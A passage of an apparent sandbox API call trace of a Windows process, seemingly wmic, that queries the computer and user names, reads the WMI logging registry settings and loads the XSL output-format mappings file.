(Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0251.338] free (_Block=0x2bb2668) [0251.338] CloseHandle (hObject=0x194) returned 1 [0251.338] malloc (_Size=0x40) returned 0x2bb11d0 [0251.338] malloc (_Size=0x40) returned 0x2bb2668 [0251.338] malloc (_Size=0x40) returned 0x2bb26b0 [0251.338] SetThreadUILanguage (LangId=0x0) returned 0x770409 [0251.343] _vsnwprintf (in: _Buffer=0x2bb26b0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x87f870 | out: _Buffer="ms_409") returned 6 [0251.343] malloc (_Size=0x20) returned 0x2bb26f8 [0251.343] GetComputerNameW (in: lpBuffer=0x2bb26f8, nSize=0x87f8d4 | out: lpBuffer="NQDPDE", nSize=0x87f8d4) returned 1 [0251.343] lstrlenW (lpString="NQDPDE") returned 6 [0251.343] malloc (_Size=0xe) returned 0x2bb2720 [0251.343] lstrlenW (lpString="NQDPDE") returned 6 [0251.343] ResolveDelayLoadedAPI () returned 0x7444db00 [0251.344] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x87f8e8 | out: lpNameBuffer=0x0, nSize=0x87f8e8) returned 0x775000 [0251.346] GetLastError () returned 0xea [0251.346] malloc (_Size=0x1e) returned 0x2bb2738 [0251.346] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2bb2738, nSize=0x87f8e8 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x87f8e8) returned 0x1 [0251.346] lstrlenW (lpString="") returned 0 [0251.347] lstrlenW (lpString="NQDPDE") returned 6 [0251.347] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0251.349] lstrlenW (lpString=".") returned 1 [0251.349] lstrlenW (lpString="NQDPDE") returned 6 [0251.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0251.349] lstrlenW (lpString="LOCALHOST") returned 9 [0251.349] lstrlenW (lpString="NQDPDE") returned 6 [0251.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0251.349] lstrlenW (lpString="NQDPDE") returned 6 [0251.349] lstrlenW (lpString="NQDPDE") returned 6 [0251.349] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0251.349] free (_Block=0x2bb2720) [0251.349] lstrlenW (lpString="NQDPDE") returned 6 [0251.349] malloc (_Size=0xe) returned 0x2bb2720 [0251.349] lstrlenW (lpString="NQDPDE") returned 6 [0251.349] lstrlenW (lpString="NQDPDE") returned 6 [0251.349] malloc (_Size=0xe) returned 0x2bb2760 [0251.349] lstrlenW (lpString="NQDPDE") returned 6 [0251.350] malloc (_Size=0x4) returned 0x2bb1218 [0251.350] malloc (_Size=0xc) returned 0x2bb2778 [0251.350] ResolveDelayLoadedAPI () returned 0x7745b870 [0251.360] malloc (_Size=0x18) returned 0x2bb2790 [0251.360] malloc (_Size=0xc) returned 0x2bb27b0 [0251.360] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.360] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.360] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.360] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.360] malloc (_Size=0x18) returned 0x2bb27c8 [0251.360] malloc (_Size=0xc) returned 0x2bb27e8 [0251.360] SysStringLen (param_1="IMPERSONATE") returned 0xb [0251.360] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.360] SysStringLen (param_1="IMPERSONATE") returned 0xb [0251.360] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.361] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.361] SysStringLen (param_1="IMPERSONATE") returned 0xb [0251.361] malloc (_Size=0x18) returned 0x2bb2800 [0251.361] malloc (_Size=0xc) returned 0x2bb2820 [0251.361] SysStringLen (param_1="DELEGATE") returned 0x8 [0251.361] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.361] SysStringLen (param_1="DELEGATE") returned 0x8 [0251.361] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.361] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.361] SysStringLen (param_1="DELEGATE") returned 0x8 [0251.361] malloc (_Size=0x18) returned 0x2bb2838 [0251.361] malloc (_Size=0xc) returned 0x2bb2858 [0251.361] malloc (_Size=0x18) returned 0x2bb2870 [0251.361] malloc (_Size=0xc) returned 0x2bb2890 [0251.361] SysStringLen (param_1="NONE") returned 0x4 [0251.361] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.361] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.361] SysStringLen (param_1="NONE") returned 0x4 [0251.361] malloc (_Size=0x18) returned 0x2bb28a8 [0251.361] malloc (_Size=0xc) returned 0x2bb28c8 [0251.361] SysStringLen (param_1="CONNECT") returned 0x7 [0251.361] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.361] malloc (_Size=0x18) returned 0x2bb28e0 [0251.361] malloc (_Size=0xc) returned 0x2bb04a0 [0251.362] SysStringLen (param_1="CALL") returned 0x4 [0251.362] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.362] SysStringLen (param_1="CALL") returned 0x4 [0251.362] SysStringLen (param_1="CONNECT") returned 0x7 [0251.362] malloc (_Size=0x18) returned 0x2bb04b8 [0251.362] malloc (_Size=0xc) returned 0x2bb04d8 [0251.362] SysStringLen (param_1="PKT") returned 0x3 [0251.362] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.362] SysStringLen (param_1="PKT") returned 0x3 [0251.362] SysStringLen (param_1="NONE") returned 0x4 [0251.362] SysStringLen (param_1="NONE") returned 0x4 [0251.362] SysStringLen (param_1="PKT") returned 0x3 [0251.362] malloc (_Size=0x18) returned 0x2bb2b68 [0251.362] malloc (_Size=0xc) returned 0x2bb04f0 [0251.362] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.362] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.362] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.362] SysStringLen (param_1="NONE") returned 0x4 [0251.362] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.362] SysStringLen (param_1="PKT") returned 0x3 [0251.362] SysStringLen (param_1="PKT") returned 0x3 [0251.362] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.362] malloc (_Size=0x18) returned 0x2bb2ca8 [0251.362] malloc (_Size=0xc) returned 0x2bb0508 [0251.362] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0251.363] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.363] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0251.363] SysStringLen (param_1="PKT") returned 0x3 [0251.363] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0251.363] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.363] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.363] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0251.363] malloc (_Size=0x18) returned 0x2bb2b28 [0251.363] malloc (_Size=0x40) returned 0x2bb0520 [0251.363] malloc (_Size=0x20a) returned 0x2bb97c8 [0251.363] GetSystemDirectoryW (in: lpBuffer=0x2bb97c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0251.363] free (_Block=0x2bb97c8) [0251.363] malloc (_Size=0xc) returned 0x2bb0568 [0251.363] malloc (_Size=0xc) returned 0x2bb0580 [0251.363] malloc (_Size=0xc) returned 0x2bb2d08 [0251.363] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0251.363] SysStringLen (param_1="\\wbem\\") returned 0x6 [0251.363] free (_Block=0x2bb0568) [0251.363] free (_Block=0x2bb0580) [0251.363] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0251.363] free (_Block=0x2bb2d08) [0251.363] malloc (_Size=0xc) returned 0x2bb98c8 [0251.363] malloc (_Size=0xc) returned 0x2bb9970 [0251.364] malloc (_Size=0xc) returned 0x2bb9988 [0251.364] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0251.364] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0251.364] free (_Block=0x2bb98c8) [0251.364] free (_Block=0x2bb9970) [0251.364] GetCurrentThreadId () returned 0x1298 [0251.364] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x87f3f8 | out: phkResult=0x87f3f8*=0x1a0) returned 0x0 [0251.364] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x87f404, lpcbData=0x87f400*=0x400 | out: lpType=0x0, lpData=0x87f404*=0x30, lpcbData=0x87f400*=0x4) returned 0x0 [0251.364] _wcsicmp (_String1="0", _String2="1") returned -1 [0251.364] _wcsicmp (_String1="0", _String2="2") returned -2 [0251.364] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x87f400*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x87f400*=0x42) returned 0x0 [0251.364] malloc (_Size=0x86) returned 0x2bb2d08 [0251.364] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2bb2d08, lpcbData=0x87f400*=0x42 | out: lpType=0x0, lpData=0x2bb2d08*=0x25, lpcbData=0x87f400*=0x42) returned 0x0 [0251.364] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0251.364] malloc (_Size=0x42) returned 0x2bb2d98 [0251.364] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0251.364] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x87f404, lpcbData=0x87f400*=0x400 | out: lpType=0x0, lpData=0x87f404*=0x36, lpcbData=0x87f400*=0xc) returned 0x0 [0251.364] _wtol (_String="65536") returned 65536 [0251.364] free (_Block=0x2bb2d08) [0251.364] RegCloseKey (hKey=0x0) returned 0x6 [0251.364] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x87f894 | out: ppv=0x87f894*=0x2dd45a8) returned 0x0 [0251.397] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x2dd45a8, xmlSource=0x87f818*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x87f880 | out: isSuccessful=0x87f880*=0xffff) returned 0x0 [0251.568] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x2dd45a8, DOMElement=0x87f890 | out: DOMElement=0x87f890*=0x2dd6b48) returned 0x0 [0251.569] malloc (_Size=0xc) returned 0x2bb9958 [0251.569] IXMLDOMElement:getElementsByTagName (in: This=0x2dd6b48, tagName="XSLFORMAT", resultList=0x87f88c | out: resultList=0x87f88c*=0x2dd9ca0) returned 0x0 [0251.570] free (_Block=0x2bb9958) [0251.570] IXMLDOMNodeList:get_length (in: This=0x2dd9ca0, listLength=0x87f888 | out: listLength=0x87f888*=21) returned 0x0 [0251.570] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=0, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.571] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="texttable.xsl") returned 0x0 [0251.571] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.571] malloc (_Size=0xc) returned 0x2bb97f0 [0251.571] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.571] free (_Block=0x2bb97f0) [0251.571] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0251.571] malloc (_Size=0xc) returned 0x2bb99b8 [0251.571] malloc (_Size=0xc) returned 0x2bb9928 [0251.571] malloc (_Size=0x18) returned 0x2bb2aa8 [0251.571] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.571] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.572] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.572] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=1, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.572] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="textvaluelist.xsl") returned 0x0 [0251.572] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.572] malloc (_Size=0xc) returned 0x2bb98c8 [0251.572] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.572] free (_Block=0x2bb98c8) [0251.572] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0251.572] malloc (_Size=0xc) returned 0x2bb97f0 [0251.572] malloc (_Size=0xc) returned 0x2bb9880 [0251.572] SysStringLen (param_1="VALUE") returned 0x5 [0251.572] SysStringLen (param_1="TABLE") returned 0x5 [0251.572] SysStringLen (param_1="TABLE") returned 0x5 [0251.572] SysStringLen (param_1="VALUE") returned 0x5 [0251.572] malloc (_Size=0x18) returned 0x2bb2ac8 [0251.572] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.572] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.572] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.572] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=2, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.573] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="textvaluelist.xsl") returned 0x0 [0251.573] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.573] malloc (_Size=0xc) returned 0x2bb9808 [0251.573] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.573] free (_Block=0x2bb9808) [0251.573] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0251.573] malloc (_Size=0xc) returned 0x2bb9808 [0251.573] malloc (_Size=0xc) returned 0x2bb99a0 [0251.573] SysStringLen (param_1="LIST") returned 0x4 [0251.573] SysStringLen (param_1="TABLE") returned 0x5 [0251.573] malloc (_Size=0x18) returned 0x2bb2cc8 [0251.573] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.573] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.573] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.573] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=3, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.573] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="rawxml.xsl") returned 0x0 [0251.573] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.573] malloc (_Size=0xc) returned 0x2bb9838 [0251.574] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.574] free (_Block=0x2bb9838) [0251.574] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0251.574] malloc (_Size=0xc) returned 0x2bb9898 [0251.574] malloc (_Size=0xc) returned 0x2bb9970 [0251.574] SysStringLen (param_1="RAWXML") returned 0x6 [0251.574] SysStringLen (param_1="TABLE") returned 0x5 [0251.574] SysStringLen (param_1="RAWXML") returned 0x6 [0251.574] SysStringLen (param_1="LIST") returned 0x4 [0251.574] SysStringLen (param_1="LIST") returned 0x4 [0251.574] SysStringLen (param_1="RAWXML") returned 0x6 [0251.574] malloc (_Size=0x18) returned 0x2bb2968 [0251.574] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.574] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.574] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.574] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=4, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.574] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="htable.xsl") returned 0x0 [0251.574] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.574] malloc (_Size=0xc) returned 0x2bb9820 [0251.574] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.575] free (_Block=0x2bb9820) [0251.575] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0251.575] malloc (_Size=0xc) returned 0x2bb9850 [0251.575] malloc (_Size=0xc) returned 0x2bb9820 [0251.575] SysStringLen (param_1="HTABLE") returned 0x6 [0251.575] SysStringLen (param_1="TABLE") returned 0x5 [0251.575] SysStringLen (param_1="HTABLE") returned 0x6 [0251.575] SysStringLen (param_1="LIST") returned 0x4 [0251.575] malloc (_Size=0x18) returned 0x2bb2ce8 [0251.575] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.575] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.575] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.575] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=5, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.575] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="hform.xsl") returned 0x0 [0251.575] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.575] malloc (_Size=0xc) returned 0x2bb9838 [0251.575] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.575] free (_Block=0x2bb9838) [0251.576] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0251.576] malloc (_Size=0xc) returned 0x2bb9838 [0251.576] malloc (_Size=0xc) returned 0x2bb98b0 [0251.576] SysStringLen (param_1="HFORM") returned 0x5 [0251.576] SysStringLen (param_1="TABLE") returned 0x5 [0251.576] SysStringLen (param_1="HFORM") returned 0x5 [0251.576] SysStringLen (param_1="LIST") returned 0x4 [0251.576] SysStringLen (param_1="HFORM") returned 0x5 [0251.576] SysStringLen (param_1="HTABLE") returned 0x6 [0251.576] malloc (_Size=0x18) returned 0x2bb2c48 [0251.576] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.576] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.576] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.576] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=6, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.576] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="xml.xsl") returned 0x0 [0251.576] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.576] malloc (_Size=0xc) returned 0x2bb98e0 [0251.576] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.576] free (_Block=0x2bb98e0) [0251.577] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0251.577] malloc (_Size=0xc) returned 0x2bb98f8 [0251.577] malloc (_Size=0xc) returned 0x2bb9958 [0251.577] SysStringLen (param_1="XML") returned 0x3 [0251.577] SysStringLen (param_1="TABLE") returned 0x5 [0251.577] SysStringLen (param_1="XML") returned 0x3 [0251.577] SysStringLen (param_1="VALUE") returned 0x5 [0251.577] SysStringLen (param_1="VALUE") returned 0x5 [0251.577] SysStringLen (param_1="XML") returned 0x3 [0251.577] malloc (_Size=0x18) returned 0x2bb2a68 [0251.577] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.577] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.577] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.577] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=7, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.577] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="mof.xsl") returned 0x0 [0251.577] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.577] malloc (_Size=0xc) returned 0x2bb98c8 [0251.577] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.577] free (_Block=0x2bb98c8) [0251.577] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0251.577] malloc (_Size=0xc) returned 0x2bb9910 [0251.578] malloc (_Size=0xc) returned 0x2bb98c8 [0251.578] SysStringLen (param_1="MOF") returned 0x3 [0251.578] SysStringLen (param_1="TABLE") returned 0x5 [0251.578] SysStringLen (param_1="MOF") returned 0x3 [0251.578] SysStringLen (param_1="LIST") returned 0x4 [0251.578] SysStringLen (param_1="MOF") returned 0x3 [0251.578] SysStringLen (param_1="RAWXML") returned 0x6 [0251.578] SysStringLen (param_1="LIST") returned 0x4 [0251.578] SysStringLen (param_1="MOF") returned 0x3 [0251.578] malloc (_Size=0x18) returned 0x2bb29c8 [0251.578] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.578] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.578] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.578] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=8, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.578] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="csv.xsl") returned 0x0 [0251.578] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.578] malloc (_Size=0xc) returned 0x2bb9940 [0251.578] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.578] free (_Block=0x2bb9940) [0251.578] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0251.579] malloc (_Size=0xc) returned 0x2bb9868 [0251.579] malloc (_Size=0xc) returned 0x2bb98e0 [0251.579] SysStringLen (param_1="CSV") returned 0x3 [0251.579] SysStringLen (param_1="TABLE") returned 0x5 [0251.579] SysStringLen (param_1="CSV") returned 0x3 [0251.579] SysStringLen (param_1="LIST") returned 0x4 [0251.579] SysStringLen (param_1="CSV") returned 0x3 [0251.579] SysStringLen (param_1="HTABLE") returned 0x6 [0251.579] SysStringLen (param_1="CSV") returned 0x3 [0251.579] SysStringLen (param_1="HFORM") returned 0x5 [0251.579] malloc (_Size=0x18) returned 0x2bb2928 [0251.579] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.579] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.579] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.579] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=9, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.579] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="texttable.xsl") returned 0x0 [0251.579] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.579] malloc (_Size=0xc) returned 0x2bb9940 [0251.579] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.579] free (_Block=0x2bb9940) [0251.580] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0251.580] malloc (_Size=0xc) returned 0x2bb9940 [0251.580] malloc 